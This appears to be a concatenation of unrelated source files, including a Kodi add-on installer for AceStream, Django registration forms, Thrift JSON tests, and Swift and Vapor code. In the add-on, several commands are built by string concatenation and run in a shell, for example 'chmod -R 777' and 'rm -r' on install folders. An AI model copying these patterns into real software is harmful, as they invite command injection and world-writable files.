if os.path.exists(os.path.join(pastaperfil,"acestream")):
shutil.rmtree(os.path.join(pastaperfil,"acestream"))
if os.path.exists(os.path.join(pastaperfil,"player")):
shutil.rmtree(os.path.join(pastaperfil,"player"))
if tarfile.is_tarfile(SPSC_KIT):
path_libraries = os.path.join(pastaperfil)
download_tools().extract(SPSC_KIT,path_libraries)
download_tools().remove(SPSC_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif xbmc.getCondVisibility('System.Platform.OSX'):
print("Detected OS: Mac OSX")
available = False
if os.uname()[-1] == "x86_64":
mac_package = osx_x64_acestream
available = True
elif os.uname()[-1] == "i386":
mac_package = osx_i386_acestream
available = True
else:
available = False
if available == True:
MAC_KIT = os.path.join('/Applications',mac_package.split("/")[-1])
if not xbmcvfs.exists(os.path.join('/Applications','Ace Stream.app')):
download_tools().Downloader(mac_package,MAC_KIT,translate(30110),translate(30000))
if xbmcvfs.exists(MAC_KIT):
xbmc.sleep(1000)
cmd = 'unzip /Applications/AceStreamWineOSX.zip'
zipa = subprocess.Popen(cmd,shell=True)
cmd = 'chmod -R 755 /Applications/Ace\ Stream.app'
print cmd
chmod = subprocess.Popen(cmd,shell=True)
try: os.remove(MAC_KIT)
except: pass
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
mensagemok(translate(30000),translate(30100))
return
elif xbmc.getCondVisibility('System.Platform.Android'):
print("Detected OS: Android")
print("Starting Acestream Configuration")
#acestream config for android
if not os.path.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
#Hack to get xbmc app id
xbmcfolder=xbmc.translatePath(addonpath).split("/")
found = False
if settings.getSetting('auto_appid') == 'true':
i = 0
sopcast_installed = False
for folder in xbmcfolder:
if folder.count('.') >= 2 and folder != addon_id :
found = True
break
else:
i+=1
if found == True:
uid = os.getuid()
app_id = xbmcfolder[i]
else:
if settings.getSetting('custom_appid') != '':
uid = os.getuid()
app_id = settings.getSetting('custom_appid')
found = True
if found == True:
settings.setSetting('app_id',app_id)
#Acestreamconfiguration for android starts here
if "arm" in os.uname()[4]:
acebundle = os.path.join(pastaperfil,android_aceengine_arm.split("/")[-1])
download_tools().Downloader(android_aceengine_arm,acebundle,translate(30111),translate(30000))
else:
acebundle = os.path.join(pastaperfil,android_aceengine_x86.split("/")[-1])
download_tools().Downloader(android_aceengine_x86,acebundle,translate(30111),translate(30000))
if tarfile.is_tarfile(acebundle):
download_tools().extract(acebundle,pastaperfil)
download_tools().remove(acebundle)
orgacestreamenginefolder = os.path.join(pastaperfil,"org.acestream.engine")
xbmc_data_path = os.path.join("/data", "data", app_id)
if os.path.exists(xbmc_data_path) and uid == os.stat(xbmc_data_path).st_uid:
android_binary_dir = os.path.join(xbmc_data_path, "files", "program.plexus")
if not os.path.exists(android_binary_dir): os.makedirs(android_binary_dir)
android_acestream_folder = os.path.join(android_binary_dir,"org.acestream.engine")
if not os.path.exists(android_acestream_folder): os.makedirs(android_acestream_folder)
else:
#clean install for android - delete old folder
print android_acestream_folder
try:
os.system("chmod -R 777 "+android_acestream_folder+"/*")
os.system("rm -r '"+android_acestream_folder+"'")
except: pass
try: os.makedirs(android_acestream_folder)
except: pass
xbmc.sleep(200)
#clean install in android - remove /sdcard/.ACEStream folder if it exists (to be enabled between versions if we need to remove older settings
#if os.path.exists(os.path.join('/sdcard','.ACEStream')):
# try:
# hidden_ace = os.path.join('/sdcard','.ACEStream')
# os.system("chmod -R 777 "+hidden_ace+"/*")
# os.system("rm -r '"+hidden_ace+"'")
# except: pass
recursive_overwrite(orgacestreamenginefolder, android_acestream_folder, ignore=None)
pythonbin = os.path.join(android_acestream_folder,"files","python","bin","python")
st = os.stat(pythonbin)
import stat
os.chmod(pythonbin, st.st_mode | stat.S_IEXEC)
if os.path.exists(orgacestreamenginefolder):
try:
os.system("chmod -R 777 "+orgacestreamenginefolder+"/*")
os.system("rm -r '"+orgacestreamenginefolder+"'")
except: pass
try: xbmcvfs.mkdir(os.path.join('/sdcard','org.acestream.engine'))
except: pass
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30112),translate(30113))
if not opcao:
settings.setSetting('engine_app','0')
else:
mensagemok(translate(30000),translate(30114),translate(30115),translate(30116))
if os.path.exists(os.path.join("sdcard","Download")):
pasta = os.path.join("sdcard","Download")
if "arm" in os.uname()[4]: acefile = os.path.join("sdcard","Download",acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join("sdcard","Download",acestreamengine_apk_x86.split("/")[-1])
else:
dialog = xbmcgui.Dialog()
pasta = dialog.browse(int(0), translate(30105), 'myprograms')
if "arm" in os.uname()[4]: acefile = os.path.join(pasta,acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join(pasta,acestreamengine_apk_x86.split("/")[-1])
if "arm" in os.uname()[4]: download_tools().Downloader(acestreamengine_apk_arm,acefile,translate(30117),translate(30000))
else: download_tools().Downloader(acestreamengine_apk_x86,acefile,translate(30117),translate(30000))
if tarfile.is_tarfile(acefile):
download_tools().extract(acefile,pasta)
download_tools().remove(acefile)
xbmc.sleep(2000)
mensagemok(translate(30000),translate(30118),pasta,translate(30108))
mensagemok(translate(30000),translate(30119),translate(30120),translate(30121))
settings.setSetting('engine_app','1')
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30122),translate(30123))
if opcao:
if os.path.exists(os.path.join("sdcard","Download")):
pasta = os.path.join("sdcard","Download")
if "arm" in os.uname()[4]: acefile = os.path.join("sdcard","Download",android_aceplayer_arm.split("/")[-1])
else: os.path.join("sdcard","Download",android_aceplayer_x86.split("/")[-1])
else:
dialog = xbmcgui.Dialog()
pasta = dialog.browse(int(0), translate(30105), 'myprograms')
if "arm" in os.uname()[4]: acefile = os.path.join(pasta,acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join(pasta,acestreamengine_apk_x86.split("/")[-1])
if "arm" in os.uname()[4]: download_tools().Downloader(android_aceplayer_arm,acefile,translate(30124),translate(30000))
else: download_tools().Downloader(android_aceplayer_x86,acefile,translate(30124),translate(30000))
if tarfile.is_tarfile(acefile):
download_tools().extract(acefile,pasta)
download_tools().remove(acefile)
xbmc.sleep(2000)
mensagemok(translate(30000),translate(30125),pasta,translate(30108))
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30126))
if opcao:
settings.setSetting('engine_app','2')
if latest_version: settings.setSetting('acestream_version',value=latest_version)
mensagemok(translate(30000),translate(30127))
return
else:
mensagemok(translate(30000),translate(30109))
return | unknown | codeparrot/codeparrot-clean | ||
###
# Copyright (c) 2004, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
    """Called by supybot at plugin-installation time.

    ``advanced`` is True when the user identified as an advanced user.
    Configuration is effected by manipulating the registry as needed.
    """
    from supybot.questions import expect, anything, something, yn
    conf.registerPlugin('Utilities', True)
    Utilities = conf.registerPlugin('Utilities')
    # Register plugin configuration variables here if any are added, e.g.:
    # conf.registerGlobalValue(Utilities, 'someConfigVariableName',
    #     registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: | unknown | codeparrot/codeparrot-clean | ||
"""
Forms and validation code for user user_registration.
"""
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
# I put this on all required fields, because it's easier to pick up
# on them with CSS or JavaScript if they have a class of "required"
# in the HTML. Your mileage may vary. If/when Django ticket #3515
# lands in trunk, this will no longer be necessary.
attrs_dict = { 'class': 'required' }
class RegistrationForm(forms.Form):
    """
    Form for registering a new user account.

    Validates that the requested username is not already in use, and
    requires the password to be entered twice to catch typos.

    Subclasses should feel free to add any additional validation they
    need, but should avoid defining a ``save()`` method -- the actual
    saving of collected user data is delegated to the active
    registration backend.
    """
    username = forms.RegexField(regex=r'^\w+$',
                                max_length=30,
                                widget=forms.TextInput(attrs=attrs_dict),
                                label=_("Username"),
                                error_messages={'invalid': _("This value must contain only letters, numbers and underscores.")})
    email = forms.EmailField(widget=forms.TextInput(attrs=dict(attrs_dict,
                                                               maxlength=75)),
                             label=_("Email address"))
    password1 = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
                                label=_("Password"))
    password2 = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
                                label=_("Password (again)"))

    def clean_username(self):
        """
        Validate that the username is alphanumeric and is not already
        in use (case-insensitive match).

        Returns the cleaned username, or raises
        ``forms.ValidationError`` if a user with that name exists.
        """
        try:
            # Only existence matters here; the matched user object itself
            # is not needed, so the result is deliberately discarded.
            User.objects.get(username__iexact=self.cleaned_data['username'])
        except User.DoesNotExist:
            return self.cleaned_data['username']
        raise forms.ValidationError(_("A user with that username already exists."))

    def clean(self):
        """
        Verify that the values entered into the two password fields
        match. Note that an error here will end up in
        ``non_field_errors()`` because it doesn't apply to a single
        field.
        """
        # Both keys are present only when the individual field validators
        # passed; skip the comparison otherwise to avoid KeyError.
        if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
            if self.cleaned_data['password1'] != self.cleaned_data['password2']:
                raise forms.ValidationError(_("The two password fields didn't match."))
        return self.cleaned_data
class RegistrationFormTermsOfService(RegistrationForm):
    """
    Subclass of ``RegistrationForm`` which adds a required checkbox
    for agreeing to a site's Terms of Service.
    """
    # An unchecked box fails validation with the ToS-specific 'required'
    # message below instead of Django's generic "this field is required".
    tos = forms.BooleanField(widget=forms.CheckboxInput(attrs=attrs_dict),
                             label=_(u'I have read and agree to the Terms of Service'),
                             error_messages={ 'required': _("You must agree to the terms to register") })
class RegistrationFormUniqueEmail(RegistrationForm):
    """
    Subclass of ``RegistrationForm`` which enforces uniqueness of
    email addresses.
    """
    def clean_email(self):
        """
        Validate that the supplied email address is unique for the
        site (case-insensitive match).

        Raises ``forms.ValidationError`` if another account already
        uses this address; otherwise returns the cleaned address.
        """
        # .exists() issues a cheap EXISTS query instead of fetching whole
        # rows just to test the queryset's truthiness.
        if User.objects.filter(email__iexact=self.cleaned_data['email']).exists():
            raise forms.ValidationError(_("This email address is already in use. Please supply a different email address."))
        return self.cleaned_data['email']
class RegistrationFormNoFreeEmail(RegistrationForm):
    """
    Subclass of ``RegistrationForm`` which disallows registration with
    email addresses from popular free webmail services; moderately
    useful for preventing automated spam registrations.

    To change the list of banned domains, subclass this form and
    override the attribute ``bad_domains``.
    """
    # Entries must be lowercase; clean_email lowercases before comparing.
    bad_domains = ['aim.com', 'aol.com', 'email.com', 'gmail.com',
                   'googlemail.com', 'hotmail.com', 'hushmail.com',
                   'msn.com', 'mail.ru', 'mailinator.com', 'live.com',
                   'yahoo.com']

    def clean_email(self):
        """
        Check the supplied email address against a list of known free
        webmail domains.

        Raises ``forms.ValidationError`` for a banned domain; otherwise
        returns the cleaned address.
        """
        # Domain names are case-insensitive (RFC 5321), so normalize to
        # lowercase before checking — otherwise 'Foo@GMAIL.COM' slips
        # through. EmailField has already validated the '@' is present.
        email_domain = self.cleaned_data['email'].split('@')[1].lower()
        if email_domain in self.bad_domains:
            raise forms.ValidationError(_("Registration using free email addresses is prohibited. Please supply a different email address."))
        return self.cleaned_data['email']
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import unittest
import math
from thrift.protocol import TSimpleJSONProtocol, TProtocol
from thrift.transport.TTransport import TMemoryBuffer
from thrift.util import Serializer
from SimpleJSONRead.ttypes import SomeStruct, Stuff, StuffMissing, Empty
def writeToJSON(obj):
    """Serialize a thrift struct with TSimpleJSONProtocol; return raw bytes."""
    buf = TMemoryBuffer()
    obj.write(TSimpleJSONProtocol.TSimpleJSONProtocol(buf))
    return buf.getvalue()
def readStuffFromJSON(jstr, struct_type=Stuff):
    """Deserialize *jstr* into a fresh instance of *struct_type*."""
    result = struct_type()
    transport = TMemoryBuffer(jstr)
    protocol = TSimpleJSONProtocol.TSimpleJSONProtocol(
        transport, struct_type.thrift_spec)
    result.read(protocol)
    return result
class TestSimpleJSONRead(unittest.TestCase):
    """Round-trip and decode tests for TSimpleJSONProtocol.

    Most cases serialize a thrift struct with writeToJSON and read it
    back with readStuffFromJSON, asserting that field values survive.
    """
    def test_primitive_type(self):
        """Primitive fields (string/short/int/long/double/bool) round-trip."""
        stuff = Stuff(
                aString="hello",
                aShort=10,
                anInteger=23990,
                aLong=123456789012,
                aDouble=1234567.9,
                aBool=True)
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(stuff_read.aString, "hello")
        self.assertEqual(stuff_read.aShort, 10)
        self.assertEqual(stuff_read.anInteger, 23990)
        self.assertEqual(stuff_read.aLong, 123456789012)
        self.assertEqual(stuff_read.aDouble, 1234567.9)
        self.assertTrue(stuff_read.aBool)
    def test_escape_string(self):
        """Backslashes and quotes in strings are escaped and restored."""
        stuff = Stuff(
                aString=b'\\"hello')
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(stuff_read.aString, '\\"hello')
    def test_unicode_in_binary_escape(self):
        """Binary fields holding escaped text produce the expected JSON."""
        stuff = Stuff(
                aBinary=b'\\"hello'.decode('utf-8'))
        j = writeToJSON(stuff)
        self.assertEqual(j, b'{\n  "aBinary": "\\\\\\"hello"\n}')
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(stuff_read.aBinary, b'\\"hello')
    def test_unicode_string(self):
        """Non-ASCII strings round-trip (bytes on py2, str on py3)."""
        stuff = Stuff(
                aString='año'.encode('utf-8'))
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        if sys.version_info[0] == 3:
            self.assertEqual(stuff_read.aString, 'año')
        else:
            self.assertEqual(stuff_read.aString, 'año'.encode('utf-8'))
    def test_unusual_numbers(self):
        """String-encoded "inf"/"-inf"/"nan" decode to float specials."""
        j = '{ "aListOfDouble": ["inf", "-inf", "nan"]}'
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(len(stuff_read.aListOfDouble), 3)
        self.assertTrue(math.isinf(stuff_read.aListOfDouble[0]))
        self.assertTrue(math.isinf(stuff_read.aListOfDouble[1]))
        self.assertTrue(math.isnan(stuff_read.aListOfDouble[2]))
    def test_unexpected_field(self):
        """Unknown JSON keys are skipped without disturbing known fields."""
        j = '{ "anInteger": 101, "unexpected": 111.1}'
        struct_read = readStuffFromJSON(j, struct_type=SomeStruct)
        self.assertEqual(struct_read.anInteger, 101)
    def test_map(self):
        """Nested map<int, map<string, list<int>>> fields round-trip."""
        stuff = Stuff(
                aMap={1: {"hello": [1,2,3,4],
                          "world": [5,6,7,8]},
                      2: {"good": [100, 200],
                          "bye": [300, 400]}
                      },
                anotherString="Hey")
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(len(stuff_read.aMap), 2)
        self.assertEqual(stuff_read.aMap[1]["hello"], [1,2,3,4])
        self.assertEqual(stuff_read.aMap[1]["world"], [5,6,7,8])
        self.assertEqual(stuff_read.aMap[2]["good"], [100, 200])
        self.assertEqual(stuff_read.aMap[2]["bye"], [300, 400])
        self.assertEqual(stuff_read.anotherString, "Hey")
    def test_list(self):
        """Deeply nested list fields round-trip."""
        stuff = Stuff(
                aList=[
                    [[["hello", "world"], ["good", "bye"]]],
                    [[["what", "is"], ["going", "on"]]]],
                anotherString="Hey")
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(len(stuff_read.aList), 2)
        self.assertEqual(stuff_read.aList[0][0][0], ["hello", "world"])
        self.assertEqual(stuff_read.aList[0][0][1], ["good", "bye"])
        self.assertEqual(stuff_read.aList[1][0][0], ["what", "is"])
        self.assertEqual(stuff_read.aList[1][0][1], ["going", "on"])
        self.assertEqual(stuff_read.anotherString, "Hey")
    def test_set(self):
        """Set-valued fields round-trip."""
        stuff = Stuff(
                aListOfSet=[set(["hello"]), set(["world"])],
                anotherString="Hey")
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(len(stuff_read.aListOfSet), 2)
        self.assertEqual(stuff_read.aListOfSet[0], set(["hello"]))
        self.assertEqual(stuff_read.aListOfSet[1], set(["world"]))
        self.assertEqual(stuff_read.anotherString, "Hey")
    def test_struct(self):
        """Struct-valued fields and lists of structs round-trip."""
        stuff = Stuff(
                aStruct=SomeStruct(anInteger=12,
                                   aMap={"hi": 1.5}),
                aListOfStruct=[
                    SomeStruct(anInteger=10,
                               aMap={"good": 2.0}),
                    SomeStruct(anInteger=11,
                               aMap={"bye": 1.0})],
                anotherString="Hey"
                )
        j = writeToJSON(stuff)
        stuff_read = readStuffFromJSON(j)
        self.assertEqual(len(stuff_read.aListOfStruct), 2)
        self.assertEqual(stuff_read.aListOfStruct[0].anInteger, 10)
        self.assertEqual(stuff_read.aListOfStruct[0].aMap["good"], 2.0)
        self.assertEqual(stuff_read.aListOfStruct[1].anInteger, 11)
        self.assertEqual(stuff_read.aListOfStruct[1].aMap["bye"], 1.0)
        self.assertEqual(stuff_read.anotherString, "Hey")
    def test_deserializer(self):
        """Serializer.deserialize with the JSON protocol factory works."""
        j = '{"aShort": 1, "anInteger": 2, "aLong": 3}'
        stuff = Stuff()
        Serializer.deserialize(
            TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
        self.assertEqual(stuff.aShort, 1)
        self.assertEqual(stuff.anInteger, 2)
        self.assertEqual(stuff.aLong, 3)
    def test_foreign_json(self):
        """
        Not all JSON that we decode will be encoded by this python thrift
        protocol implementation. E.g. this encode implementation stuffs raw
        unicode into the output, but we may use this implementation to decode
        JSON from other implementations, which escape unicode (sometimes
        incorrectly e.g. PHP). And we may use this implementation to decode
        JSON that was not encoded by thrift at all, which may contain nulls.
        """
        s = "a fancy e looks like \u00e9"
        j = '{"aString": "a fancy e looks like \\u00e9", "anotherString": null, "anInteger": 10, "unknownField": null}'
        stuff = Stuff()
        Serializer.deserialize(
            TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
        self.assertEqual(stuff.aString, s)
        def should_throw():
            # Malformed token ("nullcorrupt") must raise, not be ignored.
            j = '{"aString": "foo", "anotherString": nullcorrupt}'
            stuff = Stuff()
            Serializer.deserialize(
                TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
        self.assertRaises(TProtocol.TProtocolException, should_throw)
    def test_skip_unrecognized_fields(self):
        """Fields absent from the target struct's spec are skipped cleanly."""
        stuff = Stuff(
            aString="hello",
            aShort=10,
            anInteger=23990,
            aLong=123456789012,
            aDouble=1234567.9,
            aBool=True,
            aBinary=b'\\"hello'.decode('utf-8'),
            aStruct=SomeStruct(anInteger=12,
                               aMap={"hi": 1.5}),
            aList=[
                [[["hello", "world"], ["good", "bye"]]],
                [[["what", "is"], ["going", "on"]]]],
            aMap={1: {"hello": [1, 2, 3, 4],
                      "world": [5, 6, 7, 8]},
                  2: {"good": [100, 200],
                      "bye": [300, 400]}},
            anotherString="Hey",
            aListOfStruct=[
                SomeStruct(anInteger=10,
                           aMap={"good": 2.0}),
                SomeStruct(anInteger=11,
                           aMap={"bye": 1.0})],
            aListOfSet=[{"hello"}, {"world"}],
            aListOfDouble=[0., 1.25, 10.],
            anotherMap={3: {"foo": 1,
                            "bar": 12},
                        4: {"baz": 123,
                            "bazzz": 1234}})
        j = writeToJSON(stuff)
        # StuffMissing declares only a subset of Stuff's fields; the rest
        # must be skipped without error.
        stuff_read = readStuffFromJSON(j, struct_type=StuffMissing)
        self.assertFalse(hasattr(stuff_read, "aString"))
        self.assertFalse(hasattr(stuff_read, "aShort"))
        self.assertEqual(stuff_read.anInteger, 23990)
        self.assertFalse(hasattr(stuff_read, "aLong"))
        self.assertEqual(stuff_read.aDouble, 1234567.9)
        self.assertFalse(hasattr(stuff_read, "aBool"))
        self.assertEqual(stuff_read.aBinary, b'\\"hello')
        self.assertFalse(hasattr(stuff_read, "aStruct"))
        self.assertEqual(len(stuff_read.aList), 2)
        self.assertEqual(stuff_read.aList[0][0][0], ["hello", "world"])
        self.assertEqual(stuff_read.aList[0][0][1], ["good", "bye"])
        self.assertEqual(stuff_read.aList[1][0][0], ["what", "is"])
        self.assertEqual(stuff_read.aList[1][0][1], ["going", "on"])
        self.assertFalse(hasattr(stuff_read, "aMap"))
        self.assertEqual(stuff_read.anotherString, "Hey")
        self.assertFalse(hasattr(stuff_read, "aListOfStruct"))
        self.assertEqual(len(stuff_read.aListOfSet), 2)
        self.assertEqual(stuff_read.aListOfSet[0], {"hello"})
        self.assertEqual(stuff_read.aListOfSet[1], {"world"})
        self.assertFalse(hasattr(stuff_read, "aListOfDouble"))
        self.assertEqual(len(stuff_read.anotherMap), 2)
        self.assertEqual(stuff_read.anotherMap[3]["foo"], 1)
        self.assertEqual(stuff_read.anotherMap[3]["bar"], 12)
        self.assertEqual(stuff_read.anotherMap[4]["baz"], 123)
        self.assertEqual(stuff_read.anotherMap[4]["bazzz"], 1234)
        # An Empty struct skips every field.
        stuff_read_2 = readStuffFromJSON(j, struct_type=Empty)
        self.assertFalse(hasattr(stuff_read_2, "aString"))
        self.assertFalse(hasattr(stuff_read_2, "aShort"))
        self.assertFalse(hasattr(stuff_read_2, "anInteger"))
        self.assertFalse(hasattr(stuff_read_2, "aLong"))
        self.assertFalse(hasattr(stuff_read_2, "aDouble"))
        self.assertFalse(hasattr(stuff_read_2, "aBool"))
        self.assertFalse(hasattr(stuff_read_2, "aBinary"))
        self.assertFalse(hasattr(stuff_read_2, "aStruct"))
        self.assertFalse(hasattr(stuff_read_2, "aList"))
        self.assertFalse(hasattr(stuff_read_2, "aMap"))
        self.assertFalse(hasattr(stuff_read_2, "anotherString"))
        self.assertFalse(hasattr(stuff_read_2, "aListOfStruct"))
        self.assertFalse(hasattr(stuff_read_2, "aListOfSet"))
        self.assertFalse(hasattr(stuff_read_2, "aListOfDouble"))
        self.assertFalse(hasattr(stuff_read_2, "anotherMap"))
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
# Copyright(C) 2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
from . import BaseChain
from .. import deserialize
class PpcPosChain(BaseChain):
    """
    A blockchain with proof-of-stake as in Peercoin.
    """
    # NOTE: methods follow the surrounding module's convention of naming
    # the receiver "chain" rather than "self".
    def ds_parse_transaction(chain, ds):
        # Peercoin transactions carry an extra nTime field not present in
        # the base Bitcoin format.
        return deserialize.parse_Transaction(ds, has_nTime=True)
    def ds_parse_block(chain, ds):
        # Parse the common block fields, then the trailing block signature:
        # a compact-size length prefix followed by that many bytes.
        d = BaseChain.ds_parse_block(chain, ds)
        d['block_sig'] = ds.read_bytes(ds.read_compact_size())
        return d
//===----------------------------------------------------------------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2023 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#include "ExtractExprBase.h"
#include "RefactoringActions.h"
using namespace swift::refactoring;
// Extract-expression only applies when the resolved range is exactly one
// complete expression; all other range shapes are rejected outright.
bool RefactoringActionExtractExpr::isApplicable(const ResolvedRangeInfo &Info,
                                                DiagnosticEngine &Diag) {
  switch (Info.Kind) {
  case RangeKind::SingleExpression:
    // We disallow extract literal expression for two reasons:
    // (1) since we print the type for extracted expression, the type of a
    // literal may print as "int2048" where it is not typically users' choice;
    // (2) Extracting one literal provides little value for users.
    return checkExtractConditions(Info, Diag).success();
  case RangeKind::PartOfExpression:
  case RangeKind::SingleDecl:
  case RangeKind::MultiTypeMemberDecl:
  case RangeKind::SingleStatement:
  case RangeKind::MultiStatement:
  case RangeKind::Invalid:
    return false;
  }
  llvm_unreachable("unhandled kind");
}
// Delegate the actual edit to the shared extraction implementation.
// NOTE(review): the `false` argument presumably distinguishes this single
// extraction from the repeated-expression variant — confirm against the
// RefactoringActionExtractExprBase constructor in ExtractExprBase.h.
bool RefactoringActionExtractExpr::performChange() {
  return RefactoringActionExtractExprBase(TheFile, RangeInfo, DiagEngine, false,
                                          PreferredName, EditConsumer)
      .performChange();
}
extension Request {
    /// Creates a redirect `Response`.
    ///
    ///     router.get("redirect") { req in
    ///         return req.redirect(to: "https://vapor.codes")
    ///     }
    ///
    /// Use `.permanently` to allow browsers to cache the redirect; the
    /// default is non-permanent to avoid unexpected caching.
    /// - Parameters:
    ///   - location: The path to redirect to
    ///   - type: The type of redirect to perform
    /// - Returns: A response that provides a redirect to the specified location
    @available(*, deprecated, renamed: "redirect(to:redirectType:)")
    public func redirect(to location: String, type: RedirectType) -> Response {
        let redirectResponse = Response()
        redirectResponse.responseBox.withLockedValue {
            $0.status = type.status
            $0.headers.replaceOrAdd(name: .location, value: location)
        }
        return redirectResponse
    }

    /// Creates a redirect `Response`.
    ///
    ///     router.get("redirect") { req in
    ///         return req.redirect(to: "https://vapor.codes")
    ///     }
    ///
    /// Use `.permanent` to allow browsers to cache the redirect; the
    /// default is non-permanent to avoid unexpected caching.
    /// - Parameters:
    ///   - location: The path to redirect to
    ///   - redirectType: The type of redirect to perform
    /// - Returns: A response that redirects the client to the specified location
    public func redirect(to location: String, redirectType: Redirect = .normal) -> Response {
        let redirectResponse = Response()
        redirectResponse.responseBox.withLockedValue {
            $0.status = redirectType.status
            $0.headers.replaceOrAdd(name: .location, value: location)
        }
        return redirectResponse
    }
}
/// Specifies the type of redirect that the client should receive.
/// Specifies the type of redirect that the client should receive.
@available(*, deprecated, renamed: "Redirect")
public enum RedirectType {
    /// A cacheable redirect. Not all user-agents preserve request method and body, so
    /// this should only be used for GET or HEAD requests
    /// `301 permanent`
    case permanent
    /// Forces the redirect to come with a GET, regardless of req method.
    /// `303 see other`
    case normal
    /// Maintains original request method, ie: PUT will call PUT on redirect.
    /// `307 Temporary`
    case temporary
    /// Associated `HTTPStatus` for this redirect type.
    /// Used by `Request.redirect(to:type:)` to set the response status.
    public var status: HTTPStatus {
        switch self {
        case .permanent: return .movedPermanently
        case .normal: return .seeOther
        case .temporary: return .temporaryRedirect
        }
    }
}
/// Specifies the type of redirect that the client should receive.
public struct Redirect {
    let kind: Kind

    /// A cacheable redirect. Not all user-agents preserve request method and body, so
    /// this should only be used for GET or HEAD requests
    /// `301 permanent`
    public static var permanent: Redirect {
        return Redirect(kind: .permanent)
    }

    /// Forces the redirect to come with a GET, regardless of req method.
    /// `303 see other`
    public static var normal: Redirect {
        return Redirect(kind: .normal)
    }

    /// Maintains original request method, ie: PUT will call PUT on redirect.
    /// `307 Temporary`
    public static var temporary: Redirect {
        return Redirect(kind: .temporary)
    }

    /// Redirect where the request method and the body will not be altered. This should
    /// be used for POST redirects.
    /// `308 Permanent Redirect`
    public static var permanentPost: Redirect {
        return Redirect(kind: .permanentPost)
    }

    /// Associated `HTTPStatus` for this redirect type.
    public var status: HTTPStatus {
        switch kind {
        case .permanent:
            return .movedPermanently
        case .normal:
            return .seeOther
        case .temporary:
            return .temporaryRedirect
        case .permanentPost:
            return .permanentRedirect
        }
    }

    enum Kind {
        case permanent
        case normal
        case temporary
        case permanentPost
    }
}
# Resmoke matrix-suite mapping: derives the secondary-reads variant of the
# whole-cluster change streams passthrough from its base suite by layering
# the listed override, eval, and exclude fragments.
base_suite: change_streams_whole_cluster_passthrough
overrides:
